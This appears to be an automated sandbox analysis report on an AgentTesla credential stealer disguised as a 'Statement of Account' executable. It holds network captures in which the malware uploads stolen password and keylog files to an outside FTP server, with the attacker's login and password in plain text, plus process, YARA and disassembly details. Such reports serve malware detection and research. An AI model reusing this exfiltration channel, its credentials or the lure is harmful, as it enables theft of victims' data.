                                                server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1486&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1916010&cwnd=252&unsent_bytes=0&cid=cd596e23147c0a8d&ts=158&x=0"
                                                2024-12-31 13:02:09 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549732104.26.12.2054436292C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-31 13:02:17 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-12-31 13:02:17 UTC424INHTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:02:17 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa768ffac242e3-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1837633&cwnd=204&unsent_bytes=0&cid=683729b5134b66a9&ts=177&x=0"
                                                2024-12-31 13:02:17 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


                                                FTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Dec 31, 2024 14:01:57.269740105 CET2149707213.189.52.181192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21.220-This is a private system - No anonymous login
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                Dec 31, 2024 14:01:57.270003080 CET4970721192.168.2.5213.189.52.181USER f2241_evico
                                                Dec 31, 2024 14:01:57.459942102 CET2149707213.189.52.181192.168.2.5331 User f2241_evico OK. Password required
                                                Dec 31, 2024 14:01:57.460134983 CET4970721192.168.2.5213.189.52.181PASS Doll650#@
                                                Dec 31, 2024 14:01:57.718554020 CET2149707213.189.52.181192.168.2.5230 OK. Current restricted directory is /
                                                Dec 31, 2024 14:01:57.908855915 CET2149707213.189.52.181192.168.2.5504 Unknown command
                                                Dec 31, 2024 14:01:57.915699959 CET4970721192.168.2.5213.189.52.181PWD
                                                Dec 31, 2024 14:01:58.105416059 CET2149707213.189.52.181192.168.2.5257 "/" is your current location
                                                Dec 31, 2024 14:01:58.105654001 CET4970721192.168.2.5213.189.52.181TYPE I
                                                Dec 31, 2024 14:01:58.295603037 CET2149707213.189.52.181192.168.2.5200 TYPE is now 8-bit binary
                                                Dec 31, 2024 14:01:58.295809031 CET4970721192.168.2.5213.189.52.181PASV
                                                Dec 31, 2024 14:01:58.486294985 CET2149707213.189.52.181192.168.2.5227 Entering Passive Mode (213,189,52,181,249,31)
                                                Dec 31, 2024 14:01:58.492073059 CET4970721192.168.2.5213.189.52.181STOR PW_user-724536_2024_12_31_08_01_55.html
                                                Dec 31, 2024 14:01:59.039180994 CET2149707213.189.52.181192.168.2.5150 Accepted data connection
                                                Dec 31, 2024 14:01:59.230031013 CET2149707213.189.52.181192.168.2.5226-File successfully transferred
                                                226-File successfully transferred226 0.191 seconds (measured here), 1.78 Kbytes per second
                                                Dec 31, 2024 14:02:11.168958902 CET2149713213.189.52.181192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.220-This is a private system - No anonymous login
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                Dec 31, 2024 14:02:11.169184923 CET4971321192.168.2.5213.189.52.181USER f2241_evico
                                                Dec 31, 2024 14:02:11.359651089 CET2149713213.189.52.181192.168.2.5331 User f2241_evico OK. Password required
                                                Dec 31, 2024 14:02:11.360601902 CET4971321192.168.2.5213.189.52.181PASS Doll650#@
                                                Dec 31, 2024 14:02:11.664518118 CET2149713213.189.52.181192.168.2.5230 OK. Current restricted directory is /
                                                Dec 31, 2024 14:02:11.858036041 CET2149713213.189.52.181192.168.2.5504 Unknown command
                                                Dec 31, 2024 14:02:11.865643024 CET4971321192.168.2.5213.189.52.181PWD
                                                Dec 31, 2024 14:02:12.058001995 CET2149713213.189.52.181192.168.2.5257 "/" is your current location
                                                Dec 31, 2024 14:02:12.058142900 CET4971321192.168.2.5213.189.52.181TYPE I
                                                Dec 31, 2024 14:02:12.248311996 CET2149713213.189.52.181192.168.2.5200 TYPE is now 8-bit binary
                                                Dec 31, 2024 14:02:12.248429060 CET4971321192.168.2.5213.189.52.181PASV
                                                Dec 31, 2024 14:02:12.438653946 CET2149713213.189.52.181192.168.2.5227 Entering Passive Mode (213,189,52,181,247,243)
                                                Dec 31, 2024 14:02:12.444135904 CET4971321192.168.2.5213.189.52.181STOR PW_user-724536_2024_12_31_08_02_09.html
                                                Dec 31, 2024 14:02:13.007286072 CET2149713213.189.52.181192.168.2.5150 Accepted data connection
                                                Dec 31, 2024 14:02:13.198127031 CET2149713213.189.52.181192.168.2.5226-File successfully transferred
                                                226-File successfully transferred226 0.191 seconds (measured here), 1.78 Kbytes per second
                                                Dec 31, 2024 14:02:19.372648001 CET2149745213.189.52.181192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.220-This is a private system - No anonymous login
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:02. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                                Dec 31, 2024 14:02:19.372910976 CET4974521192.168.2.5213.189.52.181USER f2241_evico
                                                Dec 31, 2024 14:02:19.567356110 CET2149745213.189.52.181192.168.2.5331 User f2241_evico OK. Password required
                                                Dec 31, 2024 14:02:19.567485094 CET4974521192.168.2.5213.189.52.181PASS Doll650#@
                                                Dec 31, 2024 14:02:19.831259966 CET2149745213.189.52.181192.168.2.5230 OK. Current restricted directory is /
                                                Dec 31, 2024 14:02:20.025906086 CET2149745213.189.52.181192.168.2.5504 Unknown command
                                                Dec 31, 2024 14:02:20.026046038 CET4974521192.168.2.5213.189.52.181PWD
                                                Dec 31, 2024 14:02:20.220060110 CET2149745213.189.52.181192.168.2.5257 "/" is your current location
                                                Dec 31, 2024 14:02:20.220176935 CET4974521192.168.2.5213.189.52.181TYPE I
                                                Dec 31, 2024 14:02:20.413980007 CET2149745213.189.52.181192.168.2.5200 TYPE is now 8-bit binary
                                                Dec 31, 2024 14:02:20.417009115 CET4974521192.168.2.5213.189.52.181PASV
                                                Dec 31, 2024 14:02:20.610661983 CET2149745213.189.52.181192.168.2.5227 Entering Passive Mode (213,189,52,181,247,60)
                                                Dec 31, 2024 14:02:20.618400097 CET4974521192.168.2.5213.189.52.181STOR PW_user-724536_2024_12_31_08_02_17.html
                                                Dec 31, 2024 14:02:21.171152115 CET2149745213.189.52.181192.168.2.5150 Accepted data connection
                                                Dec 31, 2024 14:02:21.377569914 CET2149745213.189.52.181192.168.2.5226-File successfully transferred
                                                226-File successfully transferred226 0.206 seconds (measured here), 1.65 Kbytes per second
                                                Dec 31, 2024 14:03:29.601514101 CET4970721192.168.2.5213.189.52.181PASV
                                                Dec 31, 2024 14:03:29.791431904 CET2149707213.189.52.181192.168.2.5227 Entering Passive Mode (213,189,52,181,251,229)
                                                Dec 31, 2024 14:03:29.800921917 CET4970721192.168.2.5213.189.52.181STOR KL_user-724536_2025_01_15_08_20_38.html
                                                Dec 31, 2024 14:03:30.355446100 CET2149707213.189.52.181192.168.2.5150 Accepted data connection
                                                Dec 31, 2024 14:03:30.547830105 CET2149707213.189.52.181192.168.2.5226-File successfully transferred
                                                226-File successfully transferred226 0.192 seconds (measured here), 1.47 Kbytes per second

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:08:01:53
                                                Start date:31/12/2024
                                                Path:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                                                Imagebase:0xf70000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:08:01:53
                                                Start date:31/12/2024
                                                Path:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                                                Imagebase:0x750000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:4
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x570000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 50%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x340000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x9d0000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:08:02:15
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x590000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:08:02:15
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x5b0000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:7.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:33
                                                  Total number of Limit Nodes:5
                                                  execution_graph 14353 163d460 DuplicateHandle 14354 163d4f6 14353->14354 14355 163ad68 14358 163ae50 14355->14358 14356 163ad77 14359 163ae94 14358->14359 14360 163ae71 14358->14360 14359->14356 14360->14359 14361 163b098 GetModuleHandleW 14360->14361 14362 163b0c5 14361->14362 14362->14356 14363 1634668 14364 163467a 14363->14364 14365 1634686 14364->14365 14367 1634779 14364->14367 14368 163479d 14367->14368 14372 1634878 14368->14372 14376 1634888 14368->14376 14374 16348af 14372->14374 14373 163498c 14373->14373 14374->14373 14380 1634248 14374->14380 14377 16348af 14376->14377 14378 1634248 CreateActCtxA 14377->14378 14379 163498c 14377->14379 14378->14379 14381 1635918 CreateActCtxA 14380->14381 14383 16359db 14381->14383 14384 163d218 14385 163d25e GetCurrentProcess 14384->14385 14387 163d2b0 GetCurrentThread 14385->14387 14390 163d2a9 14385->14390 14388 163d2e6 14387->14388 14389 163d2ed GetCurrentProcess 14387->14389 14388->14389 14393 163d323 14389->14393 14390->14387 14391 163d34b GetCurrentThreadId 14392 163d37c 14391->14392 14393->14391

                                                  Executed Functions

                                                  Function 0163D208 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 163d208-163d2a7 GetCurrentProcess 298 163d2b0-163d2e4 GetCurrentThread 294->298 299 163d2a9-163d2af 294->299 300 163d2e6-163d2ec 298->300 301 163d2ed-163d321 GetCurrentProcess 298->301 299->298 300->301 302 163d323-163d329 301->302 303 163d32a-163d345 call 163d3e7 301->303 302->303 307 163d34b-163d37a GetCurrentThreadId 303->307 308 163d383-163d3e5 307->308 309 163d37c-163d382 307->309 309->308
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D296
                                                  • GetCurrentThread.KERNEL32 ref: 0163D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0163D369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 05b8233660017e602cbc2c2f7177e143617f4ca5a07876ca7309e80391146023
                                                  • Instruction ID: 0524eec1992522e2e4afb9af50ebaa91758a725877041d1ea6ff774601be51be
                                                  • Opcode Fuzzy Hash: 05b8233660017e602cbc2c2f7177e143617f4ca5a07876ca7309e80391146023
                                                  • Instruction Fuzzy Hash: 395165B09102498FEB04DFA9D948BAEBFF1FF89314F24C459E119A7360D7389984CB65
                                                  Function 0163D218 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 316 163d218-163d2a7 GetCurrentProcess 320 163d2b0-163d2e4 GetCurrentThread 316->320 321 163d2a9-163d2af 316->321 322 163d2e6-163d2ec 320->322 323 163d2ed-163d321 GetCurrentProcess 320->323 321->320 322->323 324 163d323-163d329 323->324 325 163d32a-163d345 call 163d3e7 323->325 324->325 329 163d34b-163d37a GetCurrentThreadId 325->329 330 163d383-163d3e5 329->330 331 163d37c-163d382 329->331 331->330
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D296
                                                  • GetCurrentThread.KERNEL32 ref: 0163D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0163D369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 011d8237e2c1f54dc2c13b05ecec513376522699fe3ab03b29e6e4e27dea5e7c
                                                  • Instruction ID: 08f7a988bc684439d4c78eeea48c7096e7fb64109fa5bcd8e8c9640a2fb66a3c
                                                  • Opcode Fuzzy Hash: 011d8237e2c1f54dc2c13b05ecec513376522699fe3ab03b29e6e4e27dea5e7c
                                                  • Instruction Fuzzy Hash: E35177B09102098FDB04DFAAD948BAEBBF1FF88314F20C05DE119A7360D7389984CB65
                                                  Function 0163AE50 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 361 163ae50-163ae6f 362 163ae71-163ae7e call 1639dc0 361->362 363 163ae9b-163ae9f 361->363 368 163ae80 362->368 369 163ae94 362->369 364 163aeb3-163aef4 363->364 365 163aea1-163aeab 363->365 372 163af01-163af0f 364->372 373 163aef6-163aefe 364->373 365->364 416 163ae86 call 163b4c4 368->416 417 163ae86 call 163b4e9 368->417 418 163ae86 call 163b4f8 368->418 369->363 375 163af33-163af35 372->375 376 163af11-163af16 372->376 373->372 374 163ae8c-163ae8e 374->369 379 163afd0-163b090 374->379 380 163af38-163af3f 375->380 377 163af21 376->377 378 163af18-163af1f call 1639dcc 376->378 382 163af23-163af31 377->382 378->382 411 163b092-163b095 379->411 412 163b098-163b0c3 GetModuleHandleW 379->412 383 163af41-163af49 380->383 384 163af4c-163af53 380->384 382->380 383->384 386 163af60-163af69 call 1639ddc 384->386 387 163af55-163af5d 384->387 392 163af76-163af7b 386->392 393 163af6b-163af73 386->393 387->386 395 163af99-163afa6 392->395 396 163af7d-163af84 392->396 393->392 402 163afc9-163afcf 395->402 403 163afa8-163afc6 395->403 396->395 397 163af86-163af96 call 1639dec call 1639dfc 396->397 397->395 403->402 411->412 413 163b0c5-163b0cb 412->413 414 163b0cc-163b0e0 412->414 413->414 416->374 417->374 418->374
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0163B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 8a6e3e1dd10f5e512f30dd6b5b38f34d02684048d11ae11d8927b055d606cf3d
                                                  • Instruction ID: ed55b919c2144ca05639d60800582c52569df1d55385a4ab2a83293759a104d3
                                                  • Opcode Fuzzy Hash: 8a6e3e1dd10f5e512f30dd6b5b38f34d02684048d11ae11d8927b055d606cf3d
                                                  • Instruction Fuzzy Hash: 078132B0A00B468FD724DF69D98479ABBF1BF88304F00892DD486DBB50D775E909CB95
                                                  Function 0163590D Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 419 163590d-16359d9 CreateActCtxA 421 16359e2-1635a3c 419->421 422 16359db-16359e1 419->422 429 1635a4b-1635a4f 421->429 430 1635a3e-1635a41 421->430 422->421 431 1635a51-1635a5d 429->431 432 1635a60 429->432 430->429 431->432 434 1635a61 432->434 434->434
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016359C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 4fe0bb3e92d5547533c5d1432c5a5e12ebd6b5260122ddf80a683aa38bdeae2a
                                                  • Instruction ID: 8f722a90bfc19dde87566d54cee3d0a05838c4cb6b39a853d8f39c655253f44e
                                                  • Opcode Fuzzy Hash: 4fe0bb3e92d5547533c5d1432c5a5e12ebd6b5260122ddf80a683aa38bdeae2a
                                                  • Instruction Fuzzy Hash: 164101B0C10319CEDB24CFA9C888B8DBBF1BF89304F24816AD409AB255DB756946CF51
                                                  Function 01634248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 435 1634248-16359d9 CreateActCtxA 438 16359e2-1635a3c 435->438 439 16359db-16359e1 435->439 446 1635a4b-1635a4f 438->446 447 1635a3e-1635a41 438->447 439->438 448 1635a51-1635a5d 446->448 449 1635a60 446->449 447->446 448->449 451 1635a61 449->451 451->451
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016359C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c268967c0f81a8ddf9d2605e7116ca9632d3e6f2e9cfe9a4e481ed5f6a88b362
                                                  • Instruction ID: eb15ae988ed53a77101f6d8753e1169d8aac9604238a11cb9e90de664d8e85a7
                                                  • Opcode Fuzzy Hash: c268967c0f81a8ddf9d2605e7116ca9632d3e6f2e9cfe9a4e481ed5f6a88b362
                                                  • Instruction Fuzzy Hash: 5B41FFB0C1071DCBDB24CFA9C884B9EBBB5FF89304F24806AD419AB255DB756946CF90
                                                  Function 0163D458 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 452 163d458-163d45c 453 163d4a2-163d4f4 DuplicateHandle 452->453 454 163d45e-163d49f 452->454 455 163d4f6-163d4fc 453->455 456 163d4fd-163d51a 453->456 454->453 455->456
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 1283708858be48469b201920eaab177952a11d82ff6f5075dfbb2f8365f9f8e8
                                                  • Instruction ID: 3e33217a3084e0c497418843462a99230b68e27b0833842338a69a6cd3a1c87a
                                                  • Opcode Fuzzy Hash: 1283708858be48469b201920eaab177952a11d82ff6f5075dfbb2f8365f9f8e8
                                                  • Instruction Fuzzy Hash: 9A3126B58002499FDB20CFA9D984ADEBFF4EF49320F14815AE954A7251C378A941CFA1
                                                  Function 0163D460 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 459 163d460-163d4f4 DuplicateHandle 460 163d4f6-163d4fc 459->460 461 163d4fd-163d51a 459->461 460->461
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: e4d5fa295d57f97378e2f8685bab2e20b798e75b07481abd193d00ec9ed98d40
                                                  • Instruction ID: b9584ab7648419d8ee6f22a769e76c64b4eea9c1bea284ff55c23786bda82aa5
                                                  • Opcode Fuzzy Hash: e4d5fa295d57f97378e2f8685bab2e20b798e75b07481abd193d00ec9ed98d40
                                                  • Instruction Fuzzy Hash: 8121C4B59012499FDB10CF9AD984ADEBFF9FB48310F14841AE918A3350D378A944CFA5
                                                  Function 0163B050 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 464 163b050-163b090 465 163b092-163b095 464->465 466 163b098-163b0c3 GetModuleHandleW 464->466 465->466 467 163b0c5-163b0cb 466->467 468 163b0cc-163b0e0 466->468 467->468
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0163B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: c9a4fc970d9db436a43b8d7816f452822f8de744e9fecf277806b6eadf326574
